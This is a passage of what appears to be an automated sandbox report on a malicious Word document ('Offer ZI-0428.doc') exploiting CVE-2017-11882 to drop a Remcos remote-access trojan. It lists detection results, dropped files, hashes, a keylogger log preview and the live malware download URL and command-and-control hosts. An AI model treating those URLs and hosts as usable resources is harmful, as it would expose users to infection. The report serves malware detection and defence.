and steal browser information (history, passwords, etc) 48->100

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Offer ZI-0428.doc47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                  Offer ZI-0428.doc40%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr100%AviraHEUR/AGEN.1362875
                  C:\Users\user\AppData\Roaming\znlzneAxBVd.exe100%AviraHEUR/AGEN.1362875
                  C:\Users\user\AppData\Roaming\plugman23456.scr100%AviraHEUR/AGEN.1362875
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\znlzneAxBVd.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\plugman23456.scr100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://www.imvu.comr0%Avira URL Cloudsafe
                  http://acdn.adnxs.com/ast/ast.js0%Avira URL Cloudsafe
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%Avira URL Cloudsafe
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%Avira URL Cloudsafe
                  http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
                  http://sinopecllc.top/plug.scriiC:100%Avira URL Cloudmalware
                  http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%Avira URL Cloudsafe
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%Avira URL Cloudsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%Avira URL Cloudsafe
                  https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
                  https://www.google.com0%Avira URL Cloudsafe
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                  http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%Avira URL Cloudsafe
                  http://www.nirsoft.net0%Avira URL Cloudsafe
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                  antfly50.sytes.net100%Avira URL Cloudmalware
                  http://geoplugin.net/json.gp/C0%Avira URL Cloudsafe
                  http://sinopecllc.top/plug.scr100%Avira URL Cloudmalware
                  http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
                  http://o.aolcdn.com/ads/adswrappermsni.js0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                  http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                  http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%Avira URL Cloudsafe
                  http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                  http://www.nirsoft.net/0%Avira URL Cloudsafe
                  http://static.chartbeat.com/js/chartbeat.js0%Avira URL Cloudsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%Avira URL Cloudsafe
                  https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%Avira URL Cloudsafe
                  http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%Avira URL Cloudsafe
                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%Avira URL Cloudsafe
                  https://www.ccleaner.com/go/app_cc_pro_trialkey0%Avira URL Cloudsafe
                  https://contextual.media.net/8/nrrV73987.js0%Avira URL Cloudsafe
                  http://www.imvu.com/0%Avira URL Cloudsafe
                  http://www.imvu.com0%Avira URL Cloudsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%Avira URL Cloudsafe
                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%Avira URL Cloudsafe
                  http://sinopecllc.top/plug.scrC:100%Avira URL Cloudmalware
                  https://contextual.media.net/0%Avira URL Cloudsafe
                  http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%Avira URL Cloudsafe
                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%Avira URL Cloudsafe
                  http://www.msn.com/0%Avira URL Cloudsafe
                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%Avira URL Cloudsafe
                  https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
                  http://sinopecllc.top/plug.scrj100%Avira URL Cloudmalware
                  http://cdn.at.atwola.com/_media/uac/msn.html0%Avira URL Cloudsafe
                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%Avira URL Cloudsafe
                  https://policies.yahoo.com/w3c/p3p.xml0%Avira URL Cloudsafe
                  http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe
                  http://www.ebuddy.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  antfly50.sytes.net
                  		80.85.154.121
                  		truetrue
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      sinopecllc.top
                      		31.192.235.145
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        antfly50.sytes.nettrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://sinopecllc.top/plug.scrtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://b.scorecardresearch.com/beacon.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://sinopecllc.top/plug.scriiC:EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://acdn.adnxs.com/ast/ast.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comrplugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.google.com/chrome/?p=plugin_flashplugman23456.scr, 00000015.00000002.393286872.0000000002509000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.netplugman23456.scr, 00000015.00000002.392417743.0000000000254000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://deff.nelreports.net/api/report?cat=msnbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.complugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cache.btrll.com/default/Pix-1x1.gifbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.complugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gp/Cplugman23456.scr, 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://o.aolcdn.com/ads/adswrappermsni.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/?ocid=iehpbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://static.chartbeat.com/js/chartbeat.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/de-de/?ocid=iehpbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://login.yahoo.com/config/loginplugman23456.scrfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.net/plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameplugman23456.scr, 00000005.00000002.378628217.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 0000000F.00000002.400864194.0000000002691000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.ccleaner.com/go/app_cc_pro_trialkeybhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.com/plugman23456.scr, 00000017.00000002.387492879.00000000001FC000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/8/nrrV73987.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.complugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://sinopecllc.top/plug.scrC:EQNEDT32.EXE, 00000002.00000003.363793468.0000000000387000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://contextual.media.net/bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0EQNEDT32.EXE, 00000002.00000003.363803230.000000000033C000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.msn.com/bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://sinopecllc.top/plug.scrjEQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/accounts/serviceloginplugman23456.scrfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://policies.yahoo.com/w3c/p3p.xmlbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/advertisement.ad.jsbhvEBA7.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ebuddy.complugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        80.85.154.121
                        		antfly50.sytes.netRussian Federation
                        		44493CHELYABINSK-SIGNAL-ASRUtrue
                        31.192.235.145
                        		sinopecllc.topRussian Federation
                        		43948GLESYS-ASSEtrue
                        178.237.33.50
                        		geoplugin.netNetherlands
                        		8455ATOM86-ASATOM86NLfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1465260
                        Start date and time:2024-07-01 13:57:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:30
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Offer ZI-0428.doc
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winDOC@30/27@3/3
                        EGA Information:
                        • Successful, ratio: 87.5%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 328
                        • Number of non-executed functions: 289
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Override analysis time to 78580.3547309985 for current running targets taking high CPU consumption
                        • Override analysis time to 157160.709461997 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3240 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:58:08Task SchedulerRun new task: znlzneAxBVd path: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        07:57:58API Interceptor285x Sleep call for process: EQNEDT32.EXE modified
                        07:58:01API Interceptor9672766x Sleep call for process: plugman23456.scr modified
                        07:58:03API Interceptor82x Sleep call for process: powershell.exe modified
                        07:58:04API Interceptor9x Sleep call for process: schtasks.exe modified
                        07:58:09API Interceptor34x Sleep call for process: znlzneAxBVd.exe modified
                        07:58:09API Interceptor205x Sleep call for process: taskeng.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        178.237.33.50cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        UHUH45EDRFQ.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        sinopecllc.topfile.rtfGet hashmaliciousLokibotBrowse
                        • 172.67.132.133
                        Enquiry_220062.docGet hashmaliciousAgentTeslaBrowse
                        • 172.67.132.133
                        P7098769000.docGet hashmaliciousRemcosBrowse
                        • 172.67.132.133
                        geoplugin.netcKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        UHUH45EDRFQ.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CHELYABINSK-SIGNAL-ASRUxJd712XMG6.exeGet hashmaliciousPhorpiexBrowse
                        • 185.203.237.235
                        lRT1FK9PcL.exeGet hashmaliciousPhorpiexBrowse
                        • 185.203.237.235
                        UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                        • 80.85.152.161
                        #U7535#U5b50#U53d1#U79682039920102-2022.jpg.htmGet hashmaliciousUnknownBrowse
                        • 80.85.156.131
                        https://pub-c703dadea8164d9790f4641e531245a0.r2.dev/killarhDOC.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 80.85.152.20
                        file.exeGet hashmaliciousRedLineBrowse
                        • 80.85.152.116
                        file.exeGet hashmaliciousBabuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                        • 80.85.156.25
                        pYJ4V8A183.exeGet hashmaliciousAgentTeslaBrowse
                        • 185.144.31.89
                        0017062].exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                        • 80.85.153.111
                        wLZpYyx233.exeGet hashmaliciousRedLineBrowse
                        • 80.85.152.191
                        GLESYS-ASSEhttps://link.mail.beehiiv.com/ls/click?upn=u001.AafWW5Nqnbo2z-2BTA50bGEdcgdlKW6veoHg9i0lfVykqgG210mMbY9x6wlCJFem63Ptvb1AhwNnKu2bFWir67u4CZi9kAG27a28kN3PuYedxeUyKmOac6ITo-2BRFaF-2Bd-2Fi2Ixv82DfFvf02BiAI4hE-2B33SFQFo6ls2LdouLvYQ4evOtL64w0kovPYLtYVrx27PXV8C_Brrq8-2Fl00XKb7EalRYiEGmX6heUjj2STeswY-2BsiIt8od5e7wnskh4Flyd2gRfoUQMNxCsUTDSaFM8zPDLSGDGP82i7-2F2T8vItuV5dWHeXDAA5lbmJvOIRHwwHLaZqkTAe-2FUo72xufSnVCNP9jOcjTziRyEgpuuJQJiZBB3fK9Jfw-2BwXqmN7-2Bgu5oQ-2B1xbFghH62g1lHFS1Y4CHHJPc0auTlLsB05ygQ-2FI-2F7sxR9u8jR91M7H-2BbzqUKzs-2BT3ZKLeFEIL3152abEbru7Xm-2FQccrWU8wpYyuMKn02Tn-2B2EMXTmjNNbbalm-2BJ6GnnTdkYphMczl4vx3aqH514BnG-2FxWL6zJOg9p0nIer2lira82L8b5vTqtEzMFFrshInaCk-2FIKuK7IqIBd82nujTq2sahPgOcOQZPE1-2F-2BLJyD2o7TtDkzFXunFRnYrxODO7DLzvTUoA#SZ2JyYWRsZXlAdmNjdW9ubGluZS5uZXQ=&d=DwMFaQGet hashmaliciousHTMLPhisherBrowse
                        • 31.192.232.57
                        DRAFT SHIPPING DOCUMENTS.exeGet hashmaliciousGuLoader, LokibotBrowse
                        • 31.192.239.29
                        SWU5109523I.exeGet hashmaliciousFormBook, LokibotBrowse
                        • 31.192.235.101
                        DBbkrVgETv.exeGet hashmaliciousUnknownBrowse
                        • 37.152.57.102
                        gunzipped.exeGet hashmaliciousLokibotBrowse
                        • 31.192.235.208
                        2.exeGet hashmaliciousSmokeLoaderBrowse
                        • 194.54.164.123
                        1.exeGet hashmaliciousPureLog StealerBrowse
                        • 194.54.164.123
                        x86.elfGet hashmaliciousMirai, MoobotBrowse
                        • 194.132.99.16
                        xnYuUw7KjK.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 31.192.237.18
                        IDTVfeIKcu.elfGet hashmaliciousUnknownBrowse
                        • 194.132.99.55
                        ATOM86-ASATOM86NLcKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 178.237.33.50
                        SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        UHUH45EDRFQ.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\remcos\logs.dat

                        Download File
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:data
                        Category:dropped
                        Size (bytes):298
                        Entropy (8bit):3.4904990494735313
                        Encrypted:false
                        SSDEEP:6:6lVVl55YcIeeDAlOWASA37hSNombQDgQB:6lVVlhec0W0LhykgM
                        MD5:B7CDBC33FBD0242689384EB7841A7C16
                        SHA1:E19C7F9119E113048EFE27056AB79E112E7A891C
                        SHA-256:BB813EE6D57C60330046812B887D93559FFBBFBDB9C7CDCDC1814DAF72BA7A56
                        SHA-512:2F2F09B8031C40C1B474B86495A706D7371790A11D69E0D0E826801D17F529F9A43DF60D66DA319D042F1D4E74B7AB3F464B54C7D8C81A31C85D3D0DD3549DE0
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                        Preview:....[.2.0.2.4./.0.7./.0.1. .0.7.:.5.8.:.0.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.O.f.f.e.r. .Z.I.-.0.4.2.8. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].....

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1140744
                        Entropy (8bit):7.950319983509765
                        Encrypted:false
